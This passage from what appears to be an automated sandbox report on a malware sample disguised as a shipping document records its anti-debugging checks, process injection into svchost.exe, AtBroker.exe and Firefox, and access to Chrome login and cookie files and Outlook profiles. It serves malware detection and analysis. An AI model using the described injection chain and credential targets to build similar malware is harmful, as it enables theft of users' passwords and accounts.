                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A13833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A13833
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A13B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A13B56
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A1BD48
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009B4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009B4AFE
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeAPI call chain: ExitProcess graph end nodegraph_0-98911
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeAPI call chain: ExitProcess graph end nodegraph_0-98980
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008E0101 rdtsc 2_2_008E0101
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008907AC NtCreateMutant,LdrInitializeThunk,2_2_008907AC
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A2401F BlockInput,0_2_00A2401F
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009B3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_009B3B4C
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009E5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_009E5BFC
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A2C104 LoadLibraryA,GetProcAddress,0_2_00A2C104
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00EA1858 mov eax, dword ptr fs:[00000030h]0_2_00EA1858
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00EA2EF8 mov eax, dword ptr fs:[00000030h]0_2_00EA2EF8
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00EA2E98 mov eax, dword ptr fs:[00000030h]0_2_00EA2E98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00880080 mov ecx, dword ptr fs:[00000030h]2_2_00880080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008800EA mov eax, dword ptr fs:[00000030h]2_2_008800EA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008A26F8 mov eax, dword ptr fs:[00000030h]2_2_008A26F8
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A081D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00A081D4
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009DA2A4 SetUnhandledExceptionFilter,0_2_009DA2A4
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009DA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009DA2D5

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtClose: Direct from: 0x774CFA02
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtSetInformationThread: Direct from: 0x774E9893Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeSection loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeThread APC queued: target process: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A08A73 LogonUserW,0_2_00A08A73
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009B3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_009B3B4C
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009B4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_009B4A35
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A14CFA mouse_event,0_2_00A14CFA
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe"Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A081D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00A081D4
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A14A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00A14A08
                Source: SHIPPING DOC_20241107.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: AhEyCWkdTLz.exe, 00000003.00000000.350500457.0000000001390000.00000002.00000001.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000003.00000002.874103732.0000000001390000.00000002.00000001.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000000.383603207.0000000001390000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: SHIPPING DOC_20241107.exe, AhEyCWkdTLz.exe, 00000003.00000000.350500457.0000000001390000.00000002.00000001.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000003.00000002.874103732.0000000001390000.00000002.00000001.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000000.383603207.0000000001390000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: AhEyCWkdTLz.exe, 00000003.00000000.350500457.0000000001390000.00000002.00000001.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000003.00000002.874103732.0000000001390000.00000002.00000001.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000000.383603207.0000000001390000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009D87AB cpuid 0_2_009D87AB
                Source: C:\Windows\SysWOW64\AtBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\l0j4qpvx.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\l0j4qpvx.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\l0j4qpvx.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\l0j4qpvx.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\l0j4qpvx.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\l0j4qpvx.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\l0j4qpvx.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\l0j4qpvx.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009E5007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_009E5007
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009F215F GetUserNameW,0_2_009F215F
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009E40BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_009E40BA
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009B4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009B4AFE
                Source: C:\Windows\SysWOW64\AtBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.873933070.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.436520319.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.369012864.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.874124663.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.873906744.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.873918569.0000000000160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.369018456.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.369105032.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.874128931.0000000004EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                Source: SHIPPING DOC_20241107.exeBinary or memory string: WIN_81
                Source: SHIPPING DOC_20241107.exeBinary or memory string: WIN_XP
                Source: SHIPPING DOC_20241107.exeBinary or memory string: WIN_XPe
                Source: SHIPPING DOC_20241107.exeBinary or memory string: WIN_VISTA
                Source: SHIPPING DOC_20241107.exeBinary or memory string: WIN_7
                Source: SHIPPING DOC_20241107.exeBinary or memory string: WIN_8
                Source: SHIPPING DOC_20241107.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.873933070.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.436520319.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.369012864.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.874124663.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.873906744.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
